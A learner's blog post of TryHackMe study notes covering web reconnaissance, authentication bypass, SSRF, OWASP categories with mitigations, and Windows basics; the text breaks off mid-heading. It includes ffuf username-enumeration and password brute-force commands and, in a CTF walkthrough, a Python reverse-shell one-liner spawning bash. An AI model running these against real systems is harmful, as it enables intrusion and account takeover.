<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/letter-k.svg">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/letter-k.svg">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"guayu-kakeru.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":"ture","show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="记一下thm上面学习的笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="tryhackme-学习笔记">
<meta property="og:url" content="https://guayu-kakeru.github.io/posts/30538.html">
<meta property="og:site_name" content="guayu-kakeru">
<meta property="og:description" content="记一下thm上面学习的笔记">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/690efbb13203f7be00e3e317.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/690f20693203f7be00e419cd.png">
<meta property="og:image" content="https://pic1.imgdb.cn/item/69105a5b3203f7be00e8af2f.png">
<meta property="og:image" content="https://assets.tryhackme.com/additional/win-fun1/win-desktop2.png">
<meta property="og:image" content="https://assets.tryhackme.com/additional/win-fun2/compmgmt1.png">
<meta property="article:published_time" content="2025-11-23T02:38:18.000Z">
<meta property="article:modified_time" content="2026-04-07T11:36:52.670Z">
<meta property="article:author" content="guayu-kakeru">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="tryhackme">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/690efbb13203f7be00e3e317.png">

<link rel="canonical" href="https://guayu-kakeru.github.io/posts/30538.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>tryhackme-学习笔记 | guayu-kakeru</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">guayu-kakeru</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">16</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">19</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">88</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://guayu-kakeru.github.io/posts/30538.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="guayu-kakeru">
      <meta itemprop="description" content="一年过后，你会希望从今天就开始行动。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="guayu-kakeru">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          tryhackme-学习笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-11-23 10:38:18" itemprop="dateCreated datePublished" datetime="2025-11-23T10:38:18+08:00">2025-11-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-04-07 19:36:52" itemprop="dateModified" datetime="2026-04-07T19:36:52+08:00">2026-04-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/tryhackme/" itemprop="url" rel="index"><span itemprop="name">tryhackme</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/tryhackme/%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index"><span itemprop="name">笔记</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
      
      
      
        <p>记一下thm上面学习的笔记</p>
<span id="more"></span>
<h1 id="Web-basic"><a href="#Web-basic" class="headerlink" title="Web basic"></a>Web basic</h1><p>first part is http and network like dns knowledge and i have learnt it , no notes.</p><h2 id="Web-hacking"><a href="#Web-hacking" class="headerlink" title="Web hacking"></a>Web hacking</h2><h3 id="walking-an-application"><a href="#walking-an-application" class="headerlink" title="walking an application"></a>walking an application</h3><ul><li>you should know the page in the website and what’s in it </li><li>view page source code : some secrect may in the comment or some herf<br>  also can find the framework version and can find public vulnerabilities</li><li>some resource would be stored in one directory. There might be some information(find the css,js file directory)</li><li>learn to use debugger and make a breakpoint</li></ul><h3 id="content-discovery"><a href="#content-discovery" class="headerlink" title="content discovery"></a>content discovery</h3><p>连接open-vpn  （这里我不用vpn就好了）</p><ul><li>robots.txt </li><li>favicon : <a target="_blank" rel="noopener" href="https://wiki.owasp.org/index.php/OWASP_favicon_database">https://wiki.owasp.org/index.php/OWASP_favicon_database</a><br><code>curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum</code></li><li>sitemap.xml : show all the pages that can be searched in internet </li><li>http-header : show the script language </li><li>framework stack : once we get the framwork , we can get more information (such as default password and username)</li><li>OSINT : google hacking , Wappalyzer<br>you can use:</li></ul><table><thead><tr><th></th><th></th><th></th></tr></thead><tbody><tr><td><strong>Filter</strong></td><td><strong>Example</strong></td><td><strong>Description</strong></td></tr><tr><td>site</td><td>site:tryhackme.com</td><td>returns results only from the specified website address</td></tr><tr><td>inurl</td><td>inurl:admin</td><td>returns results that have the specified word in the URL</td></tr><tr><td>filetype</td><td>filetype:pdf</td><td>returns results which are a particular file extension</td></tr><tr><td>intitle</td><td>intitle:admin</td><td>returns results that contain the specified word in the title</td></tr></tbody></table><ul><li>The Wayback Machine (<a target="_blank" rel="noopener" href="https://archive.org/web/">https://archive.org/web/</a>) 让用户可以“回到过去”，查看网站在不同时间点的样子</li><li>S3 Buckets<br>The format of the S3 buckets is http(s):&#x2F;&#x2F;<strong>{name}.</strong><a target="_blank" rel="noopener" href="http://s3.amazonaws.com/"><strong>s3.amazonaws.com</strong></a> where {name} is decided by the owner</li><li>automated discovery: use scanner to find some resources , tools like gobuster, ffuf,dirb  and so on</li></ul><h3 id="Subdomain-Enumeration"><a href="#Subdomain-Enumeration" class="headerlink" title="Subdomain Enumeration"></a>Subdomain Enumeration</h3><p>Main mathods: OSINT, Brute Force, Virtual Host</p><ul><li>SSL&#x2F;TLS Certificates : Using Certificate Transparency Logs for Subdomain Discovery<br> <a target="_blank" rel="noopener" href="https://crt.sh/">https://crt.sh</a> offer a searchable database of certificates that shows current and historical results.</li><li>search engine: <code> site:*.tryhackme.com -site:www.tryhackme.com</code></li><li>dns brute force: use tools like dnsrecon</li><li>OSINT-sublist3r: To speed up the process of OSINT subdomain discovery</li><li>Virtual-host: <code>ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H &quot;Host: FUZZ.acmeitsupport.thm&quot; -u http://10.10.231.176</code></li></ul><h3 id="Authentication-Bypass"><a href="#Authentication-Bypass" class="headerlink" title="Authentication Bypass"></a>Authentication Bypass</h3><ul><li>Use error message to help us to find valid usernames<br><code>ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d &quot;username=FUZZ&amp;email=x&amp;password=x&amp;cpassword=x&quot; -H &quot;Content-Type: application/x-www-form-urlencoded&quot; -u http://MACHINE_IP/customers/signup -mr &quot;username already exists&quot;</code><br><code>Content-Type</code> so the web server knows we are sending form data</li><li>Bruteforce: use the valid username file and another wordlist<br><code>ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d &quot;username=W1&amp;password=W2&quot; -H &quot;Content-Type: application/x-www-form-urlencoded&quot; -u http://MACHINE_IP/customers/login -fc 200</code></li><li>logic flaw: in this example, we want to reset the password of <a href="mailto:&#114;&#111;&#x62;&#101;&#x72;&#116;&#64;&#x61;&#99;&#109;&#x65;&#x69;&#116;&#115;&#117;&#112;&#x70;&#x6f;&#114;&#x74;&#46;&#116;&#x68;&#109;">robert@acmeitsupport.thm</a>. we notice that , we can assign the username and the email(we want to change ) just in the url<br><img src="https://pic1.imgdb.cn/item/690efbb13203f7be00e3e317.png"><br>and there, add a email parameter in the post data. the website will send this request to my account , and give a ticket that contains a link to log you in as Robert</li><li>Cookie Tampering:<br>The contents of some cookies can be in plain text</li></ul><table><thead><tr><th></th><th></th><th></th></tr></thead><tbody><tr><td><strong>Original String</strong></td><td><strong>Hash Method</strong></td><td><strong>Output</strong></td></tr><tr><td>1</td><td>md5</td><td>c4ca4238a0b923820dcc509a6f75849b</td></tr><tr><td>1</td><td>sha-256</td><td>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</td></tr><tr><td>1</td><td>sha-512</td><td>4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a</td></tr><tr><td>1</td><td>sha1</td><td>356a192b7913b04c54574d18c28d46e6395428ab</td></tr><tr><td>sometimes , it will use encoding like base64</td><td></td><td></td></tr></tbody></table><h3 id="IDOR"><a href="#IDOR" class="headerlink" title="IDOR"></a>IDOR</h3><ul><li>IDOR stands for Insecure Direct Object Reference and is a type of access control vulnerability</li><li>Intrusion Detection System (IDS) is a system that detects unauthorised network and system intrusions.</li><li>an excellent method of IDOR detection is to <strong>create two accounts</strong> and swap the Id numbers between them</li></ul><h3 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h3><p>two types: regular and blind<br><img src="https://pic1.imgdb.cn/item/690f20693203f7be00e419cd.png"><br>in this example, use <code>&amp;x=</code> to ignore the origin url.<br>IP <code> 169.254.169.254</code>  contains metadata for the deployed cloud server  in a cloud environment.  It can be bypasswd by DNS rebinding<br>an example: start with <code>/private</code> is been blocked . but can use <code>x/../private</code></p><h3 id="race-conditions"><a href="#race-conditions" class="headerlink" title="race conditions"></a>race conditions</h3><p>an example:<br>there’s two accounts , and i make a tranfer to let the aother to get more than $100<br><img src="https://pic1.imgdb.cn/item/69105a5b3203f7be00e8af2f.png"><br>use send in parallel<br>Mitigation:<br><strong>Synchronization Mechanisms</strong> : Modern programming languages provide synchronization mechanisms like locks<br><strong>Atomic Operations</strong> : Atomic operations refer to indivisible execution units, a set of instructions grouped together and executed without interruption.<br><strong>Database Transactions</strong> : Transactions group multiple database operations into one unit.</p><h2 id="Pickle-Rick"><a href="#Pickle-Rick" class="headerlink" title="Pickle Rick"></a>Pickle Rick</h2><p>a ctf challenge to find  three ingredient<br>first in the dashboard. we can find the username in Note.<br>second scan the dir and find robots.txt to get the password.<br>use the credential to log in and there’s a command line. use it to ‘ls’ . get first flag<br>reverse shell by using </p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="AWK"><figure class="iseeu highlight /awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;python3 -c &#x27;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;</span><span class="number">10.11</span>.<span class="number">154.86</span><span class="string">&quot;,4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;</span><span class="regexp">/bin/</span>bash<span class="string">&quot;)&#x27;&quot;</span> </span><br></pre></td></tr></table></figure></div><p> <a href="../linux/Linux%E6%8C%87%E4%BB%A4%E4%B8%8E%E7%9F%A5%E8%AF%86.md#%E5%8F%8D%E5%90%91%20Shell%EF%BC%88%E7%9B%91%E5%90%AC%E8%BF%9C%E7%A8%8B%E4%B8%BB%E6%9C%BA%E7%9A%84%E5%8F%8D%E8%BF%9E%EF%BC%89">反向 Shell（监听远程主机的反连）</a><br> and www-data can change user to <strong>root</strong></p><p>and i leant that my kali using the PC’s network(openvpn) to connenct, and havo no ip in 10.xx .<br>so i do a port forwarding . use port 4444 and that can use my PC’s ip to recieve data.</p><h1 id="OWASP-API-10"><a href="#OWASP-API-10" class="headerlink" title="OWASP API 10"></a>OWASP API 10</h1><p><strong>API is a building block for developing complex and enterprise-level applications</strong>.</p><h2 id="Broken-Objective-Level-Authorisation-BOLA"><a href="#Broken-Objective-Level-Authorisation-BOLA" class="headerlink" title="Broken Objective Level Authorisation(BOLA)"></a>Broken Objective Level Authorisation(BOLA)</h2><p>creates a scenario where the user uses the <strong>input functionality and gets access to the resources they are not authorised to access</strong><br>like <code>/apirule1/users/&#123;ID&#125;</code> </p><h2 id="Broken-User-Authentication-BUA"><a href="#Broken-User-Authentication-BUA" class="headerlink" title="Broken User Authentication(BUA)"></a>Broken User Authentication(BUA)</h2><p>The primary reason behind BUA is either <strong>invalid implementation of authentication</strong> like using incorrect email&#x2F;password queries etc., or the absence of security mechanisms like authorisation headers, tokens etc</p><p>example : not use password to valid the user only use email and can get a token.</p><h2 id="excessive-data-exposure"><a href="#excessive-data-exposure" class="headerlink" title="excessive data exposure"></a>excessive data exposure</h2><h2 id="Lack-of-Resources-rate-limiting"><a href="#Lack-of-Resources-rate-limiting" class="headerlink" title="Lack of Resources &amp; rate limiting"></a>Lack of Resources &amp; rate limiting</h2><p><strong>APIs do not enforce any restriction on</strong> the frequency of clients’ requested resources or the files’ size, which badly affects the API server performance and leads to the DoS (Denial of Service) or non-availability of service.</p><h2 id="Broken-Function-Level-Authorisation"><a href="#Broken-Function-Level-Authorisation" class="headerlink" title="Broken Function Level Authorisation"></a>Broken Function Level Authorisation</h2><p>gets access to <strong>confidential data by impersonating a high privileged user (Admin)</strong><br>like just use isAdmin field in http request to authorise admin</p><h2 id="mass-assignment"><a href="#mass-assignment" class="headerlink" title="mass assignment"></a>mass assignment</h2><p>Mass assignment reflects a scenario where <strong>client-side data is automatically bound with server-side objects or class variables</strong>. However, hackers exploit the feature by first understanding the <strong>application’s business logic</strong> and sending specially crafted data to the server, acquiring administrative access or inserting tampered data.</p><h2 id="Security-Misconfiguration"><a href="#Security-Misconfiguration" class="headerlink" title="Security Misconfiguration"></a>Security Misconfiguration</h2><p>Security misconfiguration depicts an implementation of <strong>incorrect and poorly configured security controls</strong> that put the security of the whole API at stake.</p><p>for an example, too much error messages.</p><h2 id="Injection"><a href="#Injection" class="headerlink" title="Injection"></a>Injection</h2><p> Injection flaws occur when user input is <strong>not filtered and is directly processed by an API</strong>; thus enabling the attacker to perform unintended API actions without authorisation</p><h2 id="Improper-Assets-Management"><a href="#Improper-Assets-Management" class="headerlink" title="Improper Assets Management"></a>Improper Assets Management</h2><p>Everything is wholly switched to APIv2, but the previous version, APIv1, has not been deleted yet. Considering this, one might easily guess that the older version of the API, i.e., APIv1, <strong>doesn’t have the updated or the latest security features.</strong></p><h2 id="Insufficient-Logging-Monitoring"><a href="#Insufficient-Logging-Monitoring" class="headerlink" title="Insufficient Logging &amp; Monitoring"></a>Insufficient Logging &amp; Monitoring</h2><p>however, when you try to track the hacker, <strong>there is not enough evidence available due to the absence of logging and monitoring mechanisms</strong></p><h1 id="OWASP10"><a href="#OWASP10" class="headerlink" title="OWASP10"></a>OWASP10</h1><h2 id="IAAA-Failures"><a href="#IAAA-Failures" class="headerlink" title="IAAA Failures"></a>IAAA Failures</h2><p> related to failures in how Identity, Authentication, Authorisation, and Accountability (IAAA) is implemented in the application</p><h3 id="what-is-IAAA"><a href="#what-is-IAAA" class="headerlink" title="what is IAAA"></a>what is IAAA</h3><ul><li><strong>Identity</strong> - the unique account (e.g., user ID&#x2F;email) that represents a person or service.</li><li><strong>Authentication</strong> - proving that identity (passwords, OTP, passkeys).</li><li><strong>Authorisation</strong> - what that identity is allowed to do.</li><li><strong>Accountability</strong> - recording and alerting on who did what, when, and from where.</li></ul><h3 id="A01-Broken-Access-Control"><a href="#A01-Broken-Access-Control" class="headerlink" title="A01: Broken Access Control"></a>A01: Broken Access Control</h3><p>Broken Access Control happens when the server doesn’t properly enforce <strong>who can access what</strong> on every request. A common occurence of this is <strong>IDOR</strong> (Insecure Direct Object Reference): if changing an ID (like <code>?id=7 → ?id=6</code>) lets you see or edit someone else’s data, access control is broken.</p><p> horizontal privilege escalation 、  vertical privilege escalation </p><h3 id="A07-Authentication-Failures"><a href="#A07-Authentication-Failures" class="headerlink" title="A07: Authentication Failures"></a>A07: Authentication Failures</h3><p>Authentication Failures happen when an application can’t reliably verify or bind a user’s identity. Common issues include:</p><ul><li>username enumeration</li><li>weak&#x2F;guessable passwords (no lockout&#x2F;rate limits)</li><li>logic flaws in the login&#x2F;registration flow</li><li>insecure session or cookie handling</li></ul><h3 id="A09-Logging-Alerting-Failures"><a href="#A09-Logging-Alerting-Failures" class="headerlink" title="A09: Logging &amp; Alerting Failures"></a>A09: Logging &amp; Alerting Failures</h3><p>When applications don’t record or alert on security-relevant events, defenders can’t detect or investigate attacks. Good logging underpins <strong>accountability</strong> (being able to prove who did what, when, and from where).</p><h2 id="Application-Design-Flaws"><a href="#Application-Design-Flaws" class="headerlink" title="Application Design Flaws"></a>Application Design Flaws</h2><h3 id="AS02-Security-Misconfigurations"><a href="#AS02-Security-Misconfigurations" class="headerlink" title="AS02:Security Misconfigurations"></a>AS02:Security Misconfigurations</h3><p>Security misconfigurations happen when systems, servers, or applications are deployed with <strong>unsafe defaults, incomplete settings, or exposed services</strong>. These are not code bugs but mistakes in how the environment, software, or network is set up</p><p><strong>Common Patterns</strong></p><ul><li>Default credentials or weak passwords left unchanged</li><li>Unnecessary services or endpoints exposed to the internet</li><li>Misconfigured cloud storage or permissions (S3, Azure Blob, GCP buckets)</li><li>Unrestricted API access or missing authentication&#x2F;authorisation</li><li>Verbose error messages exposing stack traces or system details</li><li>Outdated software, frameworks, or containers with known vulnerabilities</li><li>Exposed AI&#x2F;ML endpoints without proper access controls</li></ul><h3 id="AS03-Software-Supply-Chain-Failures"><a href="#AS03-Software-Supply-Chain-Failures" class="headerlink" title="AS03: Software Supply Chain Failures"></a>AS03: Software Supply Chain Failures</h3><p>Software supply chain failures happen when applications rely on components, libraries, services, or models that are compromised, outdated, or improperly verified. These weaknesses are not inherent in your code, but rather in the software and tools you depend on. Attackers exploit these weak links to inject malicious code, bypass security, or steal sensitive data.</p><p><strong>Common Patterns</strong></p><ul><li>Using unverified or unmaintained libraries and dependencies</li><li>Automatically installing updates without verification</li><li>Over-reliance on third-party AI models without monitoring or auditing</li><li>Insecure build pipelines or CI&#x2F;CD processes that allow tampering</li><li>Poor license or provenance tracking for components</li><li>Lack of monitoring for vulnerabilities in dependencies after deployment</li></ul><h3 id="AS04-Cryptographic-Failures"><a href="#AS04-Cryptographic-Failures" class="headerlink" title="AS04: Cryptographic Failures"></a>AS04: Cryptographic Failures</h3><p>Cryptographic failures happen when encryption is used incorrectly or not at all. This includes weak algorithms, hard-coded keys, poor key handling, or unencrypted sensitive data. These flaws let attackers access information that should be private.<br><strong>Common Patterns</strong> </p><ul><li>Using deprecated or weak algorithms like MD5, SHA-1, or ECB mode</li><li>Hard-coded secrets in code or configuration</li><li>Poor key rotation or management practices</li><li>Lack of encryption for sensitive data at rest or in transit</li><li>Self-signed or invalid TLS certificates</li><li>Using AI&#x2F;ML systems without proper secret handling for model parameters or sensitive inputs</li></ul><h3 id="AS06-Insecure-Design"><a href="#AS06-Insecure-Design" class="headerlink" title="AS06: Insecure Design"></a>AS06: Insecure Design</h3><p>Insecure design happens when flawed logic or architecture is built into a system from the start. These flaws stem from skipped threat modelling, no design requirements or reviews, or accidental errors.</p><p><strong>Common Insecure Designs In 2025</strong></p><ul><li>Weak business logic controls, like recovery or approval flows</li><li>Flawed assumptions about user or model behaviour</li><li>AI components with unchecked authority or access</li><li>Missing guardrails for LLMs and automation agents</li><li>Test or debug bypasses left in production</li><li>No consistent abuse-case review or AI threat modelling</li></ul><h2 id="Insecure-Data-Handling"><a href="#Insecure-Data-Handling" class="headerlink" title="Insecure Data Handling"></a>Insecure Data Handling</h2><h3 id="A04-Cryptographic-Failures"><a href="#A04-Cryptographic-Failures" class="headerlink" title="A04: Cryptographic Failures"></a>A04: Cryptographic Failures</h3><p>Cryptographic failures happen when sensitive data isn’t adequately protected due to lack of encryption, faulty implementation, or insufficient security measures. This includes storing passwords without hashing, using outdated or weak algorithms (such as MD5, SHA1, or DES), exposing encryption keys, or failing to secure data during transmission.</p><h3 id="A05-Injection"><a href="#A05-Injection" class="headerlink" title="A05: Injection"></a>A05: Injection</h3><p>Injection occurs when an application takes user input and mishandles it. Instead of processing the input securely, the application passes it directly into a system that can execute commands or queries, such as a database, a shell, a templating engine or API.</p><ul><li>SQL Injection</li><li>Command Injection</li><li>AI Prompts</li><li>Server Side Template Injection (SSTI)<br>Input validation and sanitisation play a crucial role in preventing these types of attack. Escape dangerous characters, enforce strict data types and filter before the application even processes the input.</li></ul><h3 id="A08-Software-or-Data-Integrity-Failures"><a href="#A08-Software-or-Data-Integrity-Failures" class="headerlink" title="A08: Software or Data Integrity Failures"></a>A08: Software or Data Integrity Failures</h3><p>Software or Data Integrity Failures occur when an application relies on code, updates, or data it assumes are safe, <strong>without verifying their authenticity, integrity, or origin</strong>. This includes trusting software updates without verification, loading scripts or configuration files from untrusted sources, failing to validate data that impacts application logic, or accepting data such as binaries, templates, or JSON files without confirming whether it has been altered.</p><h2 id="FIX"><a href="#FIX" class="headerlink" title="FIX"></a>FIX</h2><p> The big ideas to keep:</p><ul><li><p><strong>A01 Broken Access Control:</strong> Enforce server-side checks on <strong>every</strong> request</p></li><li><p><strong>A07 Authentication Failures:</strong> Enforce unique indexes on the canonical form, rate-limit&#x2F;lock out brute force, and rotate sessions on password&#x2F;privilege changes.</p></li><li><p><strong>A09 Logging &amp; Alerting Failures:</strong> Log the full auth lifecycle (fail&#x2F;success, password&#x2F;2FA&#x2F;role changes, admin actions), centralise logs off-host with retention, and alert on anomalies (e.g., brute-force bursts, privilege elevation).</p></li><li><p><strong>AS02:Security Misconfigurations</strong>:</p><ul><li>Harden default configurations and remove unused features or services</li><li>Enforce strong authentication and least privilege across all systems</li><li>Limit network exposure and segment sensitive resources</li><li>Keep software, frameworks, and containers up to date with patches</li><li>Hide stack traces and system information from error messages</li><li>Audit cloud configurations and permissions regularly</li><li>Secure AI endpoints and automation services with proper access controls and monitoring</li><li>Integrate configuration reviews and automated security checks into your deployment pipeline</li></ul></li><li><p><strong>AS03: Software Supply Chain Failures</strong></p><ul><li>Verify all third-party components, libraries, and AI models before use</li><li>Monitor and patch dependencies regularly</li><li>Sign, verify, and audit software updates and packages</li><li>Lock down CI&#x2F;CD pipelines and build processes to prevent tampering</li><li>Track provenance and licensing for all dependencies</li><li>Implement runtime monitoring for unusual behaviour from dependencies or AI components</li><li>Integrate supply chain threat modelling into the SDLC, including testing, deployment, and update workflows</li></ul></li><li><p><strong>AS04: Cryptographic Failures:</strong></p><ul><li>Use strong, modern algorithms such as AES-GCM, ChaCha20-Poly1305, or enforce TLS 1.3 with valid certificates</li><li>Use secure key management services like Azure Key Vault, AWS KMS, or HashiCorp Vault</li><li>Rotate secrets and keys regularly, following defined crypto periods</li><li>Document and enforce policies and standard operating procedures for key lifecycle management</li><li>Maintain a complete inventory of certificates, keys, and their owners</li><li>Ensure AI models and automation agents never expose unencrypted secrets or sensitive data</li></ul></li><li><p><strong>AS06: Insecure Design</strong></p><ul><li>Treat every model as untrusted until proven otherwise.</li><li>Validate and filter all model inputs and outputs to ensure accuracy and integrity.</li><li>Separate system prompts from user content.</li><li>Keep sensitive data out of prompts unless absolutely needed and protect it with strict controls.</li><li>Require human review for high-risk AI actions.</li><li>Log model provenance, monitor behaviour, and apply differential privacy for sensitive data.</li><li>Include AI-specific threat modelling for prompt attacks, inference risks, agent misuse, and supply chain compromise throughout the design process.</li><li>Build threat modelling into every stage of development, not just at the start.</li><li>Define clear security requirements for each feature before implementation.</li><li>Apply the principle of least privilege across users, APIs, and services.</li><li>Ensure proper authentication, authorisation, and session management across the system.</li><li>Keep dependencies, third-party components, and supply chain sources verified and up to date.</li><li>Continuously monitor and test the system for logic flaws, abuse paths, and emergent risks as new features or AI components are added.</li></ul></li><li><p><strong>A05: Injection</strong> :Preventing injection starts by ensuring that <strong>user input is always treated as untrusted</strong>. Rather than parsing directly, instead, take elements of the input for querying. For SQL queries, this means using <strong>prepared statements</strong> and parameterised queries instead of building queries through string concatenation. For OS commands, avoid functions that pass input directly to the system shell, and instead rely on safe APIs and processes that don’t invoke the shell at all.</p></li><li><p><strong>A08: Software or Data Integrity Failures</strong> :Preventing these failures begins with establishing trust boundaries. Applications should never assume that code, updates, or key pieces of data are legitimate and automatically trusted; their integrity must be verified. This involves using methods such as cryptographic checks (like checksums) for update packages and ensuring that only trusted sources can modify critical artefacts.</p></li></ul><h1 id="Windows-and-AD-Fundamentals"><a href="#Windows-and-AD-Fundamentals" class="headerlink" title="Windows and AD Fundamentals"></a>Windows and AD Fundamentals</h1><h2 id="Windows-and-AD-Fundamentals-1"><a href="#Windows-and-AD-Fundamentals-1" class="headerlink" title="Windows and AD Fundamentals"></a>Windows and AD Fundamentals</h2><h3 id="gui"><a href="#gui" class="headerlink" title="gui"></a>gui</h3><p><img src="https://assets.tryhackme.com/additional/win-fun1/win-desktop2.png"></p><ol><li>The Desktop</li><li>Start Menu</li><li>Search Box (Cortana)</li><li>Task View</li><li>Taskbar</li><li>Toolbars</li><li>Notification Area</li></ol><h3 id="File-system"><a href="#File-system" class="headerlink" title="File system:"></a>File system:</h3><p><strong>new Technology File System</strong> or simply NTFS<br>Before NTFS, there was  <strong>FAT16&#x2F;FAT32</strong> (File Allocation Table) and <strong>HPFS</strong> (High Performance File System).</p><p>Windows folder contains operating system. The System32 folder holds the important files that are critical for the operating system.</p><p><code>%windir%</code> is the system variable for the Windows folder</p><h3 id="User-Account"><a href="#User-Account" class="headerlink" title="User 